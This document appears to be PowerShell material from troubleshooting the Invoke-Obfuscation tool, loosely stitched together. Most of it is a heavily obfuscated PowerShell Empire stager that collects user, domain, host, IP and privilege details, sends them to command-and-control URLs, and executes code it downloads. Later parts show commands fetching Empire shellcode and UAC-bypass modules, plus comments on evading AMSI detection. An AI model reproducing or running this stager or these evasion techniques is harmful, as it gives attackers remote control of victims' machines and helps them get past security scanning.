)."V`AluE"::"D`efa`ul`TCREDeNtiA`ls";}if (${Cu`StoM`Head`eRS} -ne "") {${hE`AdErS} = ${cu`St`OMHeA`DERS} -split ',';${hE`Ad`erS} | &("{2}{4}{3}{1}{0}"-f 't','bjEC','FOREaC','-O','h') {${hE`A`DERKeY} = ${_}.("{1}{0}" -f 'pLIT','S').Invoke(':')[0];${h`EaDErva`lUE} = ${_}.("{1}{0}"-f 't','splI').Invoke(':')[1];${W`C}."H`EADE`RS".("{1}{0}"-f 'd','AD').Invoke(${h`eAdeR`kEY}, ${hE`ADERVA`L`ue});}}${w`c}."HE`ADeRS".("{1}{0}" -f 'dd','A').Invoke(("{2}{1}{0}"-f 'nt','ge','User-A'),${uA});${iv}=  (&("{0}{1}"-f'GC','I')  ('VaRI'+'ABle'+':Dm0o'+'8j'))."vaL`Ue"::("{1}{2}{0}" -f 'ES','GetBY','T').Invoke($(&("{0}{1}{2}"-f'GEt-','R','aNdom')));${DA`Ta} = ${E}.("{2}{1}{0}" -f 's','etBytE','g').Invoke(${I`d}) + @(0x01,0x02,0X00,0x00) +   $dm0O8J::("{1}{2}{0}"-f 's','GeT','BYtE').Invoke(${EB}."LEnG`TH");${R`c4P} = .("{1}{3}{0}{4}{2}"-f'ytES','CoNVERtTo-R','M','C4B','trEa') -RCK $(${Iv}+${s`kb}) -IN ${da`TA};${R`c4p} = ${iV} + ${rC`4p} + ${eb};${R`AW}=${wc}.("{1}{0}{2}" -f 'loadDat','Up','a').Invoke(${s}+("{2}{1}{0}{3}"-f't','admin/ge','/','.php'),("{0}{1}" -f'P','OST'),${rC`4p});${DE}=${e}.("{0}{2}{1}" -f 'GEt','inG','STR').Invoke(${r`S}.("{0}{1}" -f'D','EcrypT').Invoke(${r`AW},${F`AlSE}));${n`O`NCE}=${d`E}[0..15] -JoiN '';${k`EY}=${D`E}[16..${DE}."LeNg`TH"] -jOin '';${nOn`cE}=[StRiNg]([lonG]${N`O`NcE} + 1);${A`ES}=&("{1}{0}{2}" -f'EW-O','N','BJECt') ("{11}{0}{6}{8}{3}{4}{5}{2}{7}{9}{10}{1}" -f 'Tem','oVIDeR','Ser','Ity.CryPtOgraPHy.AeS','C','ryptO','.','v','SEcur','i','CEPr','SYS');${IV} = [ByTE] 0..255 | .("{0}{2}{1}" -f 'GeT-RA','dOM','N') -CoUNt 16;${a`es}."mO`De"="CBC";${A`ES}."k`ey"=${E}.("{2}{0}{1}" -f 'Byte','s','GET').Invoke(${K`Ey});${A`es}."iv" = ${IV};${I}=${nOn`cE}+'|'+${s}+'|'+ $l3VojY::"U`SERD`omAi`NNaMe"+'|'+ $L3vOjy::"UsER`NaME"+'|'+  (.("{0}{2}{1}"-f 'VARIab','e','l')  ("{1}{0}{2}" -f'v','l3','oJY') -VaL )::"m`ACHiNenA`me";${P}=(&("{1}{0}"-f'mI','gw') ("{9}{2}{7}{0}{6}{5}{1}{8}{3}{4}"-f'or','g','N','rATI','On','OnfI','KAdapteRC','32_Netw','u','WI')|&("{1}{0}" -f'HEre','W'){${_}."IPA`Ddr`Ess"}|&("{1}{0}{2}"-f'e','S','lect') -EXpand ("{0}{2}{1}"-f 'IPAd','REss','D'));${I`p} = @{${Tr`uE}=${p}[0];${F`AlsE}=${p}}[${p}."l`ength" -lT 6];if(!${I`p} -or ${I`P}.("{1}{0}"-f 'iM','tR').Invoke() -Eq '') {${I`p}=("{0}{1}" -f '0.0.0','.0')};${I}+="|$ip";${i}+='|'+(.("{1}{3}{0}{2}" -f'bjE','GeT-WM','cT','iO') ("{5}{4}{0}{3}{1}{2}"-f 'Ng','y','sTEm','S','ATi','Win32_OpEr'))."na`ME".("{0}{1}" -f'S','pLIt').Invoke('|')[0];if(( $l3vojy::"USe`Rn`AME").("{1}{0}" -f 'r','ToLowe').Invoke() -eq ("{2}{0}{1}" -f 'y','stem','s')){${i}+=(('n48True')  -CRepLACe ([CHAR]110+[CHAR]52+[CHAR]56),[CHAR]124)}else {${I} += '|' +([Security.Principal.WindowsPrincipal]   $15JU0H::("{1}{2}{3}{0}"-f'rrent','Get','C','u').Invoke())."isiNr`o`le"([Security.Principal.WindowsBuiltInRole] ("{3}{1}{0}{2}"-f 'nistrat','dmi','or','A'))}${N}=  $AoPkqu::("{3}{0}{1}{2}"-f'U','RRENtPrOce','sS','GeTC').Invoke();${I}+='|'+${n}."PROC`e`Ssn`Ame"+'|'+${n}."Id";${I} += (("{4}{2}{0}{1}{3}"-f'h','e','owers','llJxY','JxYp'))."r`EpL`ACE"(([ChAr]74+[ChAr]120+[ChAr]89),[StRIng][ChAr]124) + ${P`s`VER`SionTAbLe}."Psver`s`ION"."M`AjoR";${I`B2}=${e}.("{2}{1}{0}"-f's','ETByTE','g').Invoke(${I});${e`B2}=${i`V}+${a`es}.("{0}{2}{3}{4}{1}"-f'Creat','pTor','eENC','R','y').Invoke().("{0}{3}{4}{1}{2}"-f'T','A','LBLoCK','RA','NsformFIn').Invoke(${I`B2},0,${i`B2}."Le`Ngth");${H`maC}."k`Ey" = ${E}.("{1}{2}{0}" -f'S','GeTByt','e').Invoke(${K`ey});${E`B2} = ${E`B2}+${h`MAC}.("{1}{0}{2}{3}" -f 'p','COm','UTEHA','SH').Invoke(${e`B2})[0..9];${I`V2}= ( &('gi')  ("{3}{2}{0}{4}{1}"-f 'Le','8j','B','vAria',':dm0o')  )."vA`LUe"::("{1}{0}{2}" -f 'TBYtE','GE','S').Invoke($(.("{3}{2}{0}{1}" -f'Do','m','N','GET-RA')));${Da`T`A2} = ${E}.("{0}{1}" -f'GeTbyt','ES').Invoke(${I`D}) + @(0x01,0x03,0x00,0x00) +   ( &("{1}{0}"-f 'Le','VarIAB')  ('dm0o'+'8J')  )."va`luE"::("{0}{2}{1}"-f 'GeTBy','eS','T').Invoke(${E`B2}."lEn`G`TH");${R`c4P2} = .("{4}{1}{2}{3}{6}{0}{5}" -f '-RC4BYTESt','o','nvER','T','C','reaM','To') -RCK $(${i`V2}+${S`kb}) -IN ${d`A`TA2};${R`c4`P2} = ${i`V2} + ${R`c4p2} + ${E`B2};if (${Cus`TomHe`Aders} -ne "") {${he`ADeRs} = ${C`UsT`Om`HEAdERS} -SplIT ',';${H`eAde`RS} | &("{1}{4}{2}{0}{3}"-f 'J','FOr','-OB','ECT','EACh') {${he`Ad`eRkeY} = ${_}.("{1}{0}"-f 'LIT','SP').Invoke(':')[0];${H`EaDer`ValUe} = ${_}.("{0}{1}" -f 's','PLit').Invoke(':')[1];${wC}."hEa`deRs".("{1}{0}" -f'd','Ad').Invoke(${hEADer`K`ey}, ${hEADe`RV`ALue});}}${wC}."HE`ADe`Rs".("{0}{1}" -f 'Ad','d').Invoke(("{2}{0}{1}"-f'gen','t','User-A'),${u`A});${R`Aw}=${W`c}.("{1}{0}{2}{3}" -f'lo','Up','adD','ata').Invoke(${S}+("{1}{0}"-f'news.php','/'),("{0}{1}" -f 'PO','ST'),${r`C`4p2});.("{1}{0}"-f 'X','IE') $( ${e}.("{3}{1}{0}{2}"-f 'Str','ET','Ing','G').Invoke($(.("{2}{3}{1}{0}" -f'Es','T','DEcRY','pT-BY') -KEY ${k`Ey} -In ${R`AW})) );${a`ES}=${N`uLl};${s2}=${NU`Ll};${W`C}=${Nu`lL};${e`B2}=${n`Ull};${R`Aw}=${nU`Ll};${Iv}=${NU`lL};${W`c}=${NU`lL};${I}=${n`ull};${i`B2}=${Nu`LL}; (&("{0}{1}" -f'd','Ir')  ('va'+'RIAB'+'Le:t9'+'J'+'5'))."VA`LUE"::("{1}{0}" -f 'olLEcT','C').Invoke();&("{1}{2}{3}{0}" -f'e','Invoke-E','m','pir') -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${sK} -SessionKey ${K`Ey} -SessionID ${iD};}&("{4}{1}{3}{0}{2}" -f'go','art','tiate','-Ne','St') -s "$ser" -SK ("{0}{8}{2}{1}{7}{6}{3}{4}{5}" -f'3c6e0b8a9c15','a','28b9','15','3','1d','ca','98','224a82') -UA ${u};

set-ItEM  ('v'+'arIab'+'le:9ernQ'+'0')  ( [TYpe]("{1}{5}{3}{0}{2}{6}{4}" -F'ctI','R','ON.Asse','FlE','ly','E','Mb')) ;  seT-vArIaBle  ("{0}{1}"-f'j','N4Ba') ([tyPE]("{3}{1}{0}{2}" -F'ExT.eNcODI','eM.t','Ng','SYSt') )  ;  SET ("{1}{0}" -f 'Z','O8Lb') ( [tYPE]("{3}{8}{4}{7}{6}{0}{2}{1}{9}{5}" -F 'oGR','y.CSPPr','apH','SYsTEm.se','Y.','S','RypT','c','CUriT','ovIdeRFlAG') )  ;sEt-vARiablE  ("{0}{1}" -f'3E1','S') (  [tyPe]("{0}{1}{3}{2}{4}" -f 'SyStEM.N','ET','web','.','REqueST') ) ; ${9`Px} =  [typE]("{3}{1}{0}{4}{2}"-f're','TEM.nET.c','EnTiALcaCHE','sys','d')  ;  sET-VariabLe ("{0}{1}"-f '2','kU9AV') (  [TyPE]("{1}{2}{0}" -F 'nMeNT','EN','vIRo'))  ; SEt-ITeM ("{2}{0}{1}" -f'iaBLE:52F','6Z4','VaR')  ( [tYpE]("{8}{9}{1}{3}{0}{4}{5}{10}{7}{2}{6}"-f 'W','.','Tit','PrInCipal.','INdoW','si','Y','N','seCuR','Ity','De')  )  ;  sET-iTEM  ('va'+'rI'+'ABle:R'+'SJ') ( [tYpE]("{0}{2}{4}{3}{1}{6}{5}"-f's','DIaGNo','ys','.','tEM','CESs','StiCs.pRO')  ) ;  set-iTeM ("vARiablE"+":H4"+"Y"+"sF")  ( [type]("{0}{3}{2}{1}" -F'BI','ER','t','TCONveR')  ) ;   Sv ("{0}{1}"-f 'JC0','A')  ( [tYpe]('gc')  )  ;fUNcTiON sTarT`-`Ne`Go`TIATE {parAm(${s},${S`k},${U`A}='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON convE`Rtt`O-`Rc4b`yT`EsTre`AM {PaRaM (${r`cK}, ${IN})BegIn {[BYTe[]] ${S} = 0..255;${j} = 0;0..255 | FOREAcH-OBjecT {${J} = (${j} + ${s}[${_}] + ${r`cK}[${_} % ${r`Ck}."LeN`g`TH"]) % 256;${s}[${_}], ${S}[${J}] = ${S}[${J}], ${s}[${_}];};${I} = ${j} = 0;}pRocEsS {ForEacH(${BY`Te} in ${I`N}) {${i} = (${I} + 1) % 256;${J} = (${j} + ${S}[${i}]) % 256;${s}[${i}], ${S}[${j}] = ${s}[${J}], ${S}[${i}];${By`Te} -BXOR ${S}[(${S}[${i}] + ${S}[${j}]) % 256];}}}FunctIoN dEcryp`T-`BytES {Param (${K`ey}, ${IN})IF(${i`N}."LENG`TH" -Gt 32) {${hM`AC} = NEw-ObJect ("{3}{10}{4}{0}{8}{1}{2}{9}{5}{7}{11}{6}" -f'eC','Rity.CryptoGRAP','h','Sy','em.S','.HM','6','A','U','Y','ST','CSHA25');${E}= (  GeT-VARIAblE ("{0}{1}"-f'jn','4Ba')  )."Va`lUe"::"as`CiI";${m`Ac} = ${I`N}[-10..-1];${I`N} = ${I`N}[0..(${IN}."LeNg`Th" - 11)];${hm`Ac}."K`EY" = ${e}."g`e`TbYtES"(${k`EY});${exPec`T`eD} = ${HM`Ac}."cOMPu`T`EHASh"(${i`N})[0..9];IF (@(COMpARe-ObJect ${m`Ac} ${E`XPE`cTED} -SYnc 0)."lE`Ngth" -nE 0) {rETURN;}${I`V} = ${In}[0..15];${a`es} = NeW-OBJect ("{6}{10}{12}{5}{2}{11}{1}{9}{7}{8}{0}{4}{3}"-f'E','.AEsC','Ty.CrYP','iDEr','ProV','Ri','SYs','OSErV','IC','RYPT','tEm','toGRApHy','.SEcu');${a`Es}."m`oDe" = "CBC";${A`ES}."K`eY" = ${E}."gEt`B`YTeS"(${K`EY});${a`es}."I`V" = ${I`V};(${a`Es}."creat`e`DE`CRYpTOR"())."traNsFor`mF`InALBL`OCK"((${IN}[16..${in}."LEN`G`Th"]), 0, ${i`N}."LEng`Th"-16)}}${n`ULl} =   ( gEt-item  ("{2}{0}{3}{1}" -f 'BLe','Ernq0','varIA',':9'))."Val`ue"::"l`oaDWithPa`R`TIaLn`A`mE"("System.Security");${n`uLl} =   ${9eR`N`Q0}::"Lo`A`dwItHp`A`RtiAlN`AMe"("System.Core");${ERroraC`Ti`o`NPr`e`FErENce} = "SilentlyContinue";${E}=  ( varIable ("{0}{1}" -f 'JN4b','A') )."V`AluE"::"a`sCIi";${cu`STOm`H`eA`DERs} = "";${S`kb}=${e}."GE`TBY`TES"(${S`k});${a`ES}=NEw-ObjECT ("{4}{12}{15}{10}{7}{1}{8}{13}{11}{6}{3}{9}{2}{14}{0}{5}"-f 'd','r','ceP','V','Sy','er','ToSer','Y.C','Yptography.AEs','i','cURIT','p','st','Cry','ROvi','em.Se');${I`V} = [byTE] 0..255 | Get-RANDOM -cOUnt 16;${A`ES}."m`ODe"="CBC";${a`ES}."K`Ey"=${s`Kb};${a`eS}."iV" = ${Iv};${hM`Ac} = New-ObJECT ("{3}{2}{5}{7}{0}{6}{4}{1}"-f 'pT','CSHA256','YS','S','Aphy.HMA','tEm.S','OGR','ecurITY.CrY');${hM`AC}."K`Ey" = ${s`kb};${c`sP} = NEW-OBjECt ("{1}{7}{3}{0}{2}{5}{6}{4}{8}"-f'TY.Cr','Sy','Y','em.SeCuRI','Csp','p','toGRAphy.','st','ParamEtErs');${c`SP}."f`LaGs" = ${C`SP}."f`lagS" -BOR   (gET-vAriable  ("{0}{1}" -f'o8','Lbz')  )."VA`LuE"::"u`SEma`ChIne`KEys`T`OrE";${rs} = NeW-OBjECT ("{13}{10}{7}{8}{3}{11}{6}{5}{14}{4}{0}{12}{1}{2}{9}"-f 'yPTOSErvi','Ovi','de','C','ACR','p','Y','C','URITY.','r','M.SE','r','cEPR','SYsTe','TogRAPHY.RS') -ARGUMentLIST 2048,${c`sP};${R`k}=${Rs}."T`o`xmLstrINg"(${fAL`SE});${i`D}=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789"."tOC`h`ARaRR`AY"()|Get-Random -Count 8);${I`B}=${E}."Ge`Tby`Tes"(${rK});${e`B}=${I`V}+${a`ES}."C`ReAtee`NCrYP`ToR"()."TRansFoR`Mfi`Na`lbLo`CK"(${Ib},0,${iB}."leNG`Th");${EB}=${e`B}+${H`mAc}."cOMpU`TEHa`sH"(${E`B})[0..9];if(-NoT ${WC}) {${Wc}=NeW-OBjeCt ("{4}{1}{2}{3}{0}"-f 'iEnt','YSTEM.N','Et.W','ebCl','S');${W`c}."P`ROxy" =  (GEt-VaRIABLe  ("{0}{1}" -f'3E1','s')  -vAlu  )::"Ge`TsysTEMWE`B`p`RO`XY"();${W`c}."pr`OXy"."cRED`enT`IALS" =  ${9`Px}::"DeF`Au`ltCrE`DEN`TiaLs";}if (${C`u`Stom`heAders} -ne "") {${HE`A`dErs} = ${c`u`sT`OMHea`DErS} -SpLIt ',';${he`A`DERs} | FOREACH-OBjEcT {${HeA`DeR`KeY} = ${_}."s`PlIT"(':')[0];${he`Ad`eRvAl`ue} = ${_}."sPL`It"(':')[1];${wC}."HEA`d`eRS"."A`DD"(${hEAdEr`k`ey}, ${h`eADerv`ALUE});}}${WC}."He`ADErs"."A`dD"("User-Agent",${U`A});${Iv}= (gcI ("Va"+"Ri"+"aBLE:h4ys"+"F")  )."vAl`UE"::"g`eTbyt`eS"($(GeT-RandOm));${d`Ata} = ${e}."gEtBY`TeS"(${i`d}) + @(0X01,0x02,0X00,0X00) +  ( GeT-vARIAbLE ("{0}{1}" -f'H4y','sF') )."VAl`Ue"::"G`ETbYT`Es"(${EB}."L`ENgtH");${Rc`4P} = CONVertTO-RC4BYTeStrEam -RCK $(${IV}+${S`Kb}) -IN ${da`TA};${Rc`4P} = ${iv} + ${RC`4P} + ${E`B};${r`AW}=${wc}."UPLO`AddA`Ta"(${S}+"/news.php","POST",${RC`4P});${D`e}=${e}."gETsTR`ing"(${R`S}."DeCR`Ypt"(${r`AW},${fA`L`Se}));${nO`NCe}=${DE}[0..15] -JOiN '';${k`EY}=${D`E}[16..${dE}."lEn`G`Th"] -JoIn '';${NON`CE}=[String]([LONG]${n`o`NCe} + 1);${a`Es}=NEw-ObjeCt ("{9}{0}{3}{2}{10}{4}{5}{6}{8}{1}{7}"-f'T','ovID','cuRI','EM.SE','rApHy','.A','EsCrypToSERvIce','eR','PR','SYS','TY.CRypTog');${I`V} = [BYtE] 0..255 | Get-RANdOM -COuNT 16;${a`es}."Mo`De"="CBC";${a`es}."K`ey"=${E}."G`etbyTEs"(${k`Ey});${a`es}."iv" = ${i`V};${i}=${NO`N`cE}+'|'+${S}+'|'+ ( Dir  ("{2}{3}{0}{1}"-f'iABlE:2KU9','av','va','R')  )."v`ALue"::"usERdo`maI`N`NaMe"+'|'+  (  GCI  ('vArIABL'+'E:2'+'k'+'U9aV') )."v`ALUe"::"US`Ern`AMe"+'|'+  (  VARiAbLe ("{0}{1}"-f'2','ku9aV')  )."vA`lUE"::"MAch`iNen`A`ME";${p}=(gwMi ("{2}{5}{4}{6}{0}{1}{3}{7}"-f 'ra','Ti','WIN32_NeTWO','o','f','RKAdapTERCon','IGu','N')|WHeRE{${_}."I`padDRe`Ss"}|SeLECT -ExPAnD ("{1}{2}{0}"-f 'S','IPADD','ReS'));${I`P} = @{${t`RUe}=${p}[0];${f`AlSE}=${P}}[${p}."LEng`TH" -Lt 6];iF(!${i`P} -or ${I`P}."t`Rim"() -Eq '') {${I`p}='0.0.0.0'};${i}+="|$ip";${i}+='|'+(GeT-WMIObjECT ("{3}{1}{0}{2}{4}" -f's','RATInGSy','te','WiN32_Ope','m'))."n`Ame"."SpL`it"('|')[0];if((  ( gET-vaRiAbLE  ("{0}{1}" -f '2ku9','AV') -VALUEOnLy)::"uSE`RNA`Me")."t`O`LoweR"() -eq "system"){${I}+="|True"}else {${I} += '|' +([Security.Principal.WindowsPrincipal]   ( GCI  ("{4}{1}{0}{2}{3}" -f 'aBlE:5','i','2','F6Z4','vAr') )."va`lUe"::"GeTcUR`R`ENT"())."isiNr`O`le"([Security.Principal.WindowsBuiltInRole] "Administrator")}${N}= ${r`Sj}::"geT`c`uRren`Tp`ROCEsS"();${i}+='|'+${n}."PROCES`SnA`ME"+'|'+${n}."iD";${I} += "|powershell|" + ${PS`Ve`RsiOn`T`AbLE}."ps`Ve`RsIoN"."MaJ`OR";${I`B2}=${e}."ge`TBYt`es"(${I});${e`B2}=${I`V}+${A`es}."crE`AT`e`EnCrY`Ptor"()."T`R`AnSformFiNA`Lb`LOCK"(${i`B2},0,${i`B2}."L`eNgth");${hm`Ac}."k`ey" = ${E}."G`E`TByTes"(${k`EY});${E`B2} = ${E`B2}+${hM`Ac}."cOmpUT`E`HaSh"(${E`B2})[0..9];${I`V2}=  ${h`4y`sF}::"G`etBYt`eS"($(Get-RaNDOM));${D`Ata2} = ${e}."GE`Tbyt`eS"(${i`d}) + @(0x01,0X03,0x00,0x00) +  ( GET-vArIabLe  ('H4y'+'SF')  -Valueo  )::"gE`T`ByTes"(${E`B2}."LE`N`GTh");${r`c4P2} = CoNvERTTO-RC4BYTEStrEam -RCK $(${I`V2}+${S`Kb}) -IN ${D`At`A2};${Rc`4p2} = ${I`V2} + ${r`C4`p2} + ${e`B2};if (${cU`sT`o`MheA`DErs} -ne "") {${Hea`DE`RS} = ${CUsto`mh`EAdERS} -SpLIT ',';${hea`derS} | ForEAcH-ObJECT {${HeA`Derk`EY} = ${_}."S`PLIt"(':')[0];${HeA`d`eRv`ALUE} = ${_}."s`Plit"(':')[1];${Wc}."HeaDE`RS"."A`dd"(${h`ea`d`eRKEY}, ${h`e`AD`eRVAlUe});}}${wC}."hE`A`derS"."a`Dd"("User-Agent",${U`A});${R`AW}=${W`C}."U`PL`oAddA`TA"(${s}+"/login/process.php","POST",${R`C4P2});IEX $( ${E}."gET`StrI`NG"($(DECRYpT-BYTes -KEy ${k`Ey} -In ${R`AW})) );${a`es}=${Nu`LL};${s2}=${N`ULL};${WC}=${N`ull};${E`B2}=${NU`ll};${R`AW}=${N`uLl};${iv}=${nu`LL};${W`c}=${n`ull};${i}=${nU`ll};${i`B2}=${N`Ull};  ( geT-vaRIaBLe  ("{1}{0}"-f 'c0A','j'))."VAL`ue"::"cO`Ll`eCt"();Invoke-Empire -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${SK} -SessionKey ${K`Ey} -SessionID ${i`D};}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA ${U};

PS> git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
PS> wget https://github.com/adaptivethreat/Empire/raw/master/data/module_source/situational_awareness/network/Get-SPN.ps1
PS> wget https://github.com/adaptivethreat/Empire/raw/master/data/module_source/privesc/Invoke-EventVwrBypass.ps1
PS> wget https://github.com/adaptivethreat/Empire/raw/master/data/module_source/code_execution/Invoke-Shellcode.ps1
PS> Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1

[*] Validating necessary commands are loaded into current PowerShell session.

[*] Function Loaded :: Out-ObfuscatedTokenCommand
[*] Function Loaded :: Out-ObfuscatedStringCommand
[*] Function Loaded :: Out-EncodedAsciiCommand
[*] Function Loaded :: Out-EncodedHexCommand
[*] Function Loaded :: Out-EncodedOctalCommand
[*] Function Loaded :: Out-EncodedBinaryCommand
[*] Function Loaded :: Out-SecureStringCommand
[*] Function Loaded :: Out-EncodedBXORCommand
[*] Function Loaded :: Out-PowerShellLauncher
[*] Function Loaded :: Invoke-Obfuscation

[*] All modules loaded and ready to run Invoke-Obfuscation

PS> Out-ObfuscatedTokenCommand -Path .\Get-SPN.ps1 | Out-File out
Obfuscating Get-SPN.ps1

[*] Obfuscating 27 Comment tokens.

[*] Obfuscating 69 String tokens.
Exception calling "Create" with "1" argument(s): "At line:14 char:21
+ ... HelpMessage=("{8}{12}{14}{1}{11}{13}{5}{10}{3}{0}{7}{4}{2}{6}{9}{15}" ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:19 char:21
+ ... HelpMessage=("{8}{11}{5}{9}{2}{0}{1}{10}{4}{6}{7}{3}"-f 'r Domain','  ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
(errors continue)

function Get-SPN
{   
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$false,
        HelpMessage="Credentials to use when connecting to a Domain Controller.")]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty

    )
}

# For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of ().
# The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses.
# Actual error that led to this is: "Attribute argument must be a constant or a script block."
# ALLOWED     :: [CmdletBinding(DefaultParameterSetName={"{1}{0}{2}"-f'd','DumpCre','s'})]
# NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=("{1}{0}{2}"-f'd','DumpCre','s'))]

$SubStringStart = 30
If($Token.Start -lt $SubStringStart)
{
	$SubStringStart = $Token.Start
}
	
$SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower()
If($SubString.Contains('parametersetname') -AND $SubString.Contains('='))
{
	$EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE
}

$LastEndBracketIndex = $ScriptString.LastIndexOf(']', $Token.Start)
$LastBeginBracketIndex = $ScriptString.LastIndexOf('[', $Token.Start)
$LastEndParenIndex = $ScriptString.LastIndexOf(')', $Token.Start)
$LastBeginParenIndex = $ScriptString.LastIndexOf('(', $Token.Start)

If($LastBeginBracketIndex -gt $LastEndBracketIndex -AND $LastBeginParenIndex -gt $LastEndParenIndex)
{
	$LastCommaIndex = $ScriptString.LastIndexOf(',', $Token.Start)
	$BeginSubStringIndex = [math]::max($LastBeginBracketIndex, $LastCommaIndex)
	$ScriptSubString = $ScriptString.SubString($BeginSubStringIndex, $Token.Start-$BeginSubStringIndex).ToLower()

	If(($ScriptSubString.Contains('parametersetname') -OR $ScriptSubString.Contains('confirmimpact') -OR $ScriptSubString.Contains('helpmessage')) -AND $ScriptSubString.Contains('='))
	{
		$EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE
	}
}

PS> git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
PS> wget https://github.com/adaptivethreat/Empire/raw/master/data/module_source/situational_awareness/network/powerview.ps1
PS> Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1

[*] Validating necessary commands are loaded into current PowerShell session.

[*] Function Loaded :: Out-ObfuscatedTokenCommand
[*] Function Loaded :: Out-ObfuscatedStringCommand
[*] Function Loaded :: Out-EncodedAsciiCommand
[*] Function Loaded :: Out-EncodedHexCommand
[*] Function Loaded :: Out-EncodedOctalCommand
[*] Function Loaded :: Out-EncodedBinaryCommand
[*] Function Loaded :: Out-SecureStringCommand
[*] Function Loaded :: Out-EncodedBXORCommand
[*] Function Loaded :: Out-PowerShellLauncher
[*] Function Loaded :: Invoke-Obfuscation

[*] All modules loaded and ready to run Invoke-Obfuscation

PS> Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out
Obfuscating powerview.ps1

[*] Obfuscating 747 Comment tokens.
[*]             600 Comment tokens remaining to obfuscate.
[*]             500 Comment tokens remaining to obfuscate.
[*]             400 Comment tokens remaining to obfuscate.
[*]             300 Comment tokens remaining to obfuscate.
[*]             200 Comment tokens remaining to obfuscate.
[*]             100 Comment tokens remaining to obfuscate.

[*] Obfuscating 1990 String tokens.
[*]             1800 String tokens remaining to obfuscate.
[*]             1700 String tokens remaining to obfuscate.
[*]             1600 String tokens remaining to obfuscate.
[*]             1500 String tokens remaining to obfuscate.
[*]             1400 String tokens remaining to obfuscate.
[*]             1300 String tokens remaining to obfuscate.
[*]             1200 String tokens remaining to obfuscate.
[*]             1100 String tokens remaining to obfuscate.
[*]             1000 String tokens remaining to obfuscate.
[*]              900 String tokens remaining to obfuscate.
[*]              800 String tokens remaining to obfuscate.
[*]              700 String tokens remaining to obfuscate.
[*]              600 String tokens remaining to obfuscate.
[*]              500 String tokens remaining to obfuscate.
[*]              400 String tokens remaining to obfuscate.
[*]              300 String tokens remaining to obfuscate.
[*]              200 String tokens remaining to obfuscate.
[*]              100 String tokens remaining to obfuscate.

[*] Obfuscating 531 Argument tokens.
[*]             400 Argument tokens remaining to obfuscate.
[*]             300 Argument tokens remaining to obfuscate.
[*]             200 Argument tokens remaining to obfuscate.
[*]             100 Argument tokens remaining to obfuscate.
Exception calling "Create" with "1" argument(s): "At line:445 char:7
+ filter ("{0}{2}{1}{3}{4}"-f 'E','t-','xpor','PowerViewCS','V') {
+       ~
Missing name after filter keyword.
(errors continue)

# Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations.
# For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality.
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function'))
{
	$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token
	Return $ScriptString
}

# Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations.
# For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality.
# This is also true of the 'filter' keyword
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter'))
{
	$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token
	Return $ScriptString
}

PS C:\Users\Administrator\Documents> cd Invoke-Obfuscation
PS C:\Users\Administrator\Documents\Invoke-Obfuscation> Import-Module ./Invoke-Obfuscation.psd1
PS C:\Users\Administrator\Documents\Invoke-Obfuscation> Invoke-Obfuscation
Invoke-Obfuscation : The term 'Invoke-Obfuscation' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1 char:1
+ Invoke-Obfuscation
+ ~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Obfuscation:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException


Suggestion [3,General]: The command Invoke-Obfuscation was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type: ".\Invoke-Obfuscation". See "get-help about_Command_Precedence" for more details.
PS C:\Users\Administrator\Documents\Invoke-Obfuscation> .\Invoke-Obfuscation
PS C:\Users\Administrator\Documents\Invoke-Obfuscation> :(

ERROR: Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing SET SCRIPTBLOCK script_block_or_command or SET SCRIPTPATH path_to_script_or_URL.

Successfully set ScriptPath:
c:\users\user\desktop\code.ps1

Invoke-Obfuscation\Encoding> show options

SHOW OPTIONS :: Yellow options can be set by entering SET OPTIONNAME VALUE.

[*] ScriptPath : c:\users\user\desktop\code.ps1
[*] ScriptBlock:
[*] CommandLineSyntax: Invoke-Obfuscation -ScriptPath 'c:\users\user\desktop\code.ps1'
[*] ExecutionCommands:
[*] ObfuscatedCommand:
[*] ObfuscationLength:

# If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way.
# Must come back and address this after vacation.
# Variable can be displaying or setting: "setting var like $($var='secret') and now displaying $var"
# For now just split on whitespace instead of passing to Out-Concatenated

